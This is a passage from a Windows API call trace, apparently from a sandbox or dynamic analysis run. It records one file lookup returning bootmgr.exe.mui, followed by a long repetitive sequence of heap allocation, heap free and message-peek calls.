ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.020] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.020] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.020] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 